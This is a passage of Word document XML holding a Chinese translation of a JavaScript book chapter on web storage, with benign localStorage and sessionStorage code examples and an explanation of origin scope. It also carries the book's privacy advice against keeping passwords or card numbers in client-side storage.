        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文件系统</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书第</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍过现在主流浏览器都支持一个文件对象，用以将择的文件通过</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>上传到服务端。与之相关的规范（草案阶段）定义了一组</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，用于操作一个私有的本地文件系统。在该文件系统中可以进行对文件的读写操作。这些内容正在紧锣密鼓标准化当中，这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>将在</w:t>
      </w:r>
      <w:r>
        <w:t>22.7</w:t>
      </w:r>
      <w:r>
        <w:t>节中介绍。随着这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>被广泛地实现和支持，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用可以使用类似基于文件的存储机制，这对于大部</w:t>
      </w:r>
      <w:r>
        <w:t>分程序员来说再熟悉不过了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>存储、安全和隐私</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器通常会提供</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>记住</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>密码</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>功能，这些密码会以加密的形式安全地存储到硬盘上。然而，本章介绍的任何形式的客户端数据存储都不牵涉加密：任何存储在用户硬盘上的数据都是未加密的形式。这样一来，对于拥有电脑访问权限的恶意用户以及计算机上存在的恶意软件（比如：间谍软件）同样也可以获取到存储的数据。因此，任何形式的客户端存储不应该用来保存密码、商业账号或者其他类似的敏感信息。记住：尽管用户访问你的网站时，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>愿意在表单中输入一些信息，但绝不代表用户愿意将这些信息保存到硬盘上。就拿信用卡卡号来举例好了，这是用户的隐</w:t>
      </w:r>
      <w:r>
        <w:t>私，用户并不愿意公开，如果你利用客户端持久性将该信息存储起来，这无异于你将信用卡号写在一张便签纸上，随后粘贴在用户的键盘上，让所有人都看到。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>还有要谨记的一点：很多</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>用户不信任那些使用</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>和其他客户端存储机制来做类似</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>跟踪</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>功能的网站。所以，尽量尝试用本章讨论的存储机制来为网站提升用户体验；而不是用它们来收集和侵犯隐私相关的数据。如果网站滥用客户端存储，用户将会禁用该功能，这样一来不仅起不到效果，还会导致依赖客户端存储的网站完全不可用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="506" w:name="20_1_localStorageHe_sessionStorage"/>
      <w:r>
        <w:t>20.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStor</w:t>
      </w:r>
      <w:r>
        <w:t>age</w:t>
      </w:r>
      <w:bookmarkEnd w:id="506"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实现了</w:t>
      </w:r>
      <w:r>
        <w:t>“Web</w:t>
      </w:r>
      <w:r>
        <w:t>存储</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>草案标准的浏览器在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上定义了两个属性：</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>。这两个属性都代表同一个</w:t>
      </w:r>
      <w:r>
        <w:t>Storage</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>一个持久化关联数组，数组使用字符串来索引，存储的值也都是字符串形式的。</w:t>
      </w:r>
      <w:r>
        <w:t>Storage</w:t>
      </w:r>
      <w:r>
        <w:t>对象在使用上和一般的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象没什么区别：设置对象的属性为字符串值，随后浏览器会将该值存储起来。</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>两者的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>区别在于存储的有效期和作用域的不同：数据可以存储多长时间以及谁拥有数据的访问权</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面，我们会对存储的有效期和作用域进行详细的解释。不过，在此之前，让我们先来看些例子。下面的代码使用的是</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>，但是它对</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>也同样适用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var name=localStorage.username;//</w:t>
      </w:r>
      <w:r>
        <w:t>查询一个存储的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>name=localStorage["username"];//</w:t>
      </w:r>
      <w:r>
        <w:t>等价于数组表示法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!name){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>name=prompt("What is your name?");//</w:t>
      </w:r>
      <w:r>
        <w:t>询问用户一个问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.username=name;//</w:t>
      </w:r>
      <w:r>
        <w:t>存储用户的答案</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>迭代所有存储的</w:t>
      </w:r>
      <w:r>
        <w:t>name/value</w:t>
      </w:r>
      <w:r>
        <w:t>对</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var name in localStorage){//</w:t>
      </w:r>
      <w:r>
        <w:t>迭代所有存储的名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var value=localStorage[name];//</w:t>
      </w:r>
      <w:r>
        <w:t>查询每个名字对应的值</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Storage</w:t>
      </w:r>
      <w:r>
        <w:t>对象还定义了一些诸如存储、获取、遍历和删除的方法。这些方法会在</w:t>
      </w:r>
      <w:r>
        <w:t>20.1.2</w:t>
      </w:r>
      <w:r>
        <w:t>节中介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“Web</w:t>
      </w:r>
      <w:r>
        <w:t>存储</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>草案标准指出，我们既可以存储结构化的数据（对象和数组），也可以存储原始类型数据，还可以存储诸如日期、正则</w:t>
      </w:r>
      <w:r>
        <w:t>表达式甚至文件对象在内的内置类型的数据。但是，截至本书截稿时，浏览器仅仅支持存储字符串类型数据。如果想要存储和获</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>取其他类型的数据，不得不自己手动进行编码和解码。如以下例子所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当存储一个数字的时候，会把它自动转换成一个字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>但是，当获取该值的时候别忘记了手动将其转换成数字类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.x=10;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=parseInt(localStorage.x);//</w:t>
      </w:r>
      <w:r>
        <w:t>同样地，存储一个日期类型数据的时候进行编码，获取的时候进行解码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.lastRead=(new</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Date()).toUTCString();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var lastRead=new Date(Date.parse(localStorage.lastRead));//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>可以使得对基本数据类型编码的工作变得很方便</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.data=JSON.stringify(data);//</w:t>
      </w:r>
      <w:r>
        <w:t>编码然后存储</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data=JSON.parse(localStorage.data);//</w:t>
      </w:r>
      <w:r>
        <w:t>获取数值之后再解码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="507" w:name="20_1_1_Cun_Chu_You_Xiao_Qi_He_Zuo_Yong_Y"/>
      <w:r>
        <w:t>20.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　存储有效期和作用域</w:t>
      </w:r>
      <w:bookmarkEnd w:id="507"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>区别在于存储的有效期和作用域的不同。通过</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>存储的数据是永久性的，除非</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用刻意删除存储的数据，或者用户通过设置浏览器配置（浏览器提供的特定</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>）来删除，否则数据将一直保留在用户的电脑上，永不过期。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>的作用域是限定在文档源（</w:t>
      </w:r>
      <w:r>
        <w:t>document origin</w:t>
      </w:r>
      <w:r>
        <w:t>）级别的。正如</w:t>
      </w:r>
      <w:r>
        <w:t>13.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节所介绍的，文档源是通过协议、主机名以及端口三者来确定的，因此，下面每个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>都拥有不同的文档源：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>http://www.example.com//</w:t>
      </w:r>
      <w:r>
        <w:t>协议</w:t>
      </w:r>
      <w:r>
        <w:t>:http;</w:t>
      </w:r>
      <w:r>
        <w:t>主机名</w:t>
      </w:r>
      <w:r>
        <w:t>:www.e</w:t>
      </w:r>
      <w:r>
        <w:t>xample.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>https://www.example.com//</w:t>
      </w:r>
      <w:r>
        <w:t>不同协议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>http://static.example.com//</w:t>
      </w:r>
      <w:r>
        <w:t>不同主机名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>http://www.example.com:8000//</w:t>
      </w:r>
      <w:r>
        <w:t>不同端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>同源的文档间共享同样的</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>数据（不论该源的脚本是否真正地访问</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>）。它们可以互相读取对方的数据，甚至可以覆盖对方的数据。但是，非同源的文档间互相都不能读取或者覆盖对方的数据（即使它们运行的脚本是来自同一台第三方服务器也不行）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>的作用域也受浏览器供应商限制。如果你使用</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>访问站点，那么下次用另一个浏览器（比如，</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>）再次访问的时候，那么本次是无法获取上次存储的数据的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>存储的数据和通过</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>存储的数据的有效期也是不同的：前者的有效期和存储数据的脚本所在的最顶层的窗口或者是浏览器标签页是一样的。一旦窗口或者标签页被永久关闭了，那么所有通过</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>存储的数据也都被删除了。（当时要注意的是，现代浏览器已经具备了重新</w:t>
      </w:r>
      <w:r>
        <w:t>打开最近关闭的标签页随后恢复上一次浏览的会话功能，因此，这些标签页以及与之相关的</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>的有效期可能会更加长些）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>一样，</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>的作用域也是限定在文档源中，因此非同源文档间都是无法共享</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>的。不仅如此，</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>的作用域还被限定在窗口中。如果同源的文档渲染在不同的浏览器标签页中，那么它们互相之间拥有的是各自的</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>数据，无法共享；一个标签页中的脚本是无法读取或者覆盖由另一个标签</w:t>
      </w:r>
      <w:r>
        <w:t>页脚本写入的数据，哪怕这两个标签页渲染的是同一个页面，运行的是同一个脚本也不行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要注意的是：这里提到的基于窗口作用域的</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>指的窗口只是顶级窗口。如果一个浏览器标签页包含两个＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，它们所包含的文档是同源的，那么这两者之间是可以共享</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="508" w:name="20_1_2_Cun_Chu_API"/>
      <w:r>
        <w:t>20.1.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　存储</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:bookmarkEnd w:id="508"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>通常被当做普通的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象使用：通过设置属性来存储字符串值，查询该属性来读取该值。除此之外，这两个对象还提供了更加</w:t>
      </w:r>
      <w:r>
        <w:t>正式的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。调用</w:t>
      </w:r>
      <w:r>
        <w:t>setItem()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，将对应的名字和值传递进去，可以实现数据存储。调用</w:t>
      </w:r>
      <w:r>
        <w:t>getItem()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，将名字传递进去，可以获取对应的值。调用</w:t>
      </w:r>
      <w:r>
        <w:t>removeItem()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，将名字传递进去，可以删除对应的数据。（在非</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>中，还可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>操作符来删除数据，就和对普通的对象使用</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>操作符一样。）调用</w:t>
      </w:r>
      <w:r>
        <w:t>clear()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（不需要参数），可以删除所有存储的数据。最后，使用</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性以及</w:t>
      </w:r>
      <w:r>
        <w:t>key()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，传入</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>length-1</w:t>
      </w:r>
      <w:r>
        <w:t>的数字，可以枚举所有存储数据的名字。下面是一些使用</w:t>
      </w:r>
      <w:r>
        <w:t>lo</w:t>
      </w:r>
      <w:r>
        <w:t>calStrage</w:t>
      </w:r>
      <w:r>
        <w:t>的例子。这些代码对</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>也适用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.setItem("x",1);//</w:t>
      </w:r>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>"x"</w:t>
      </w:r>
      <w:r>
        <w:t>的名字存储一个数值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.getItem("x");//</w:t>
      </w:r>
      <w:r>
        <w:t>获取数值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>枚举所有存储的名字</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage.length;i++){//length</w:t>
      </w:r>
      <w:r>
        <w:t>表示了所有名字</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对的总数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var name=localStorage.key(i);//</w:t>
      </w:r>
      <w:r>
        <w:t>获取第</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>对的名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var value=localStorage.ge</w:t>
      </w:r>
      <w:r>
        <w:t>tItem(name);//</w:t>
      </w:r>
      <w:r>
        <w:t>获取该对的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.removeItem("x");//</w:t>
      </w:r>
      <w:r>
        <w:t>删除</w:t>
      </w:r>
      <w:r>
        <w:t>"x"</w:t>
      </w:r>
      <w:r>
        <w:t>项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
